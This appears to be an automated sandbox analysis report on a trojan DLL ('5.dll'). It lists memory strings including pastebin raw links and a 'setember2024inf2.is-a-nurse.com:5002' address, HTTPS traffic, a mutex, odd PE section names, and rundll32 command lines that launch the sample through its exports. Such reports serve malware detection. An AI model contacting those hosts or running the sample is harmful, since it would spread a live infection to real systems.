Source: rundll32.exe, 0000000A.00000002.3087009066.00000000063C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3072215647.0000000004E83000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000005093000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2998925851.0000000006810000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.3138224365.0000000006800000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004813000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3751406101.0000000005D50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004CC3000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3052031087.0000000006300000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2846831139.0000000006630000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000014.00000003.2660141145.00000000066F0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.3064367145.0000000006480000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004DF3000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://www.indyproject.org/
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdfS
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://www.schneier.com/paper-blowfish-fse.htmlS
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdfS
Source: rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com//
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/5
Source: rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/5$
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/5_
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/5e
Source: rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/I
Source: rundll32.exe, 0000000D.00000003.3721963112.000000000690C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000690C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3488118098.000000000690C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/L
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/V
Source: rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/X
Source: rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/_
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/i
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZELZp1Yr
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZELZp1YrEM$-
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZELZp1YrHu
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DF1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZELZp1YrI%
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZELZp1YrILE_X
Source: rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZELZp1YrQu
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZELZp1Yrl
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZELZp1Yrrt
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/hQqNRrQt
Source: rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/hQqNRrQt40
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/hQqNRrQt:u
Source: rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/hQqNRrQtHu
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3751406101.0000000005DE3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setember2024inf2.is-a-nurse.com:50
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005D6D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setember2024inf2.is-a-nurse.com:5002/02
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setember2024inf2.is-a-nurse.com:50K5

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49764 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: 5.dll	Static PE information: section name: .IiZ_A$8
Source: 5.dll	Static PE information: section name: bO\=]JeA
Source: 5.dll	Static PE information: section name: >9P5ZP$
Source: 5.dll	Static PE information: section name: \(SnMqUq
Source: 5.dll	Static PE information: section name: cKc<oclJ
Source: 5.dll	Static PE information: section name: L2(#1D;
Source: 5.dll	Static PE information: section name: PC2X@$2+
Source: 5.dll	Static PE information: section name: ]8;-`=q(
Source: 5.dll	Static PE information: section name: Rjm*8iMX
Source: 5.dll	Static PE information: section name: pCck@0(<
Source: 5.dll	Static PE information: section name: M;H3Mr
Source: 5.dll	Static PE information: section name: U(#)2R<D

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7432 -s 704

Source: 5.dll

Static PE information: Number of sections : 13 > 10

Source: 5.dll

Binary or memory string: OriginalFileName vs 5.dll

Source: 5.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal92.troj.evad.winDLL@24/18@2/2

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\Desktop\rundll32.txt

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8004
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7432
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7396
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7972
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\azo06olt3gs7uifwf18b8
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\57dad3d0-12c3-4d73-a23e-ef86eb4ddec3

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,TMethodImplementationIntercept

Source: 5.dll	ReversingLabs: Detection: 34%
Source: 5.dll	Virustotal: Detection: 36%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\5.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,TMethodImplementationIntercept
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,__dbk_fcall_wrapper
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,azo06olt3gs7uifwf18b8
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",__dbk_fcall_wrapper
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",azo06olt3gs7uifwf18b8
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",dbkFCallWrapperAddr
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7432 -s 704
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7972 -s 712
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 696
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 696
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,TMethodImplementationIntercept	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,__dbk_fcall_wrapper	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,azo06olt3gs7uifwf18b8	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",TMethodImplementationIntercept	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",__dbk_fcall_wrapper	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",azo06olt3gs7uifwf18b8	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",dbkFCallWrapperAddr	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: netapi32.dll	Jump to behavior
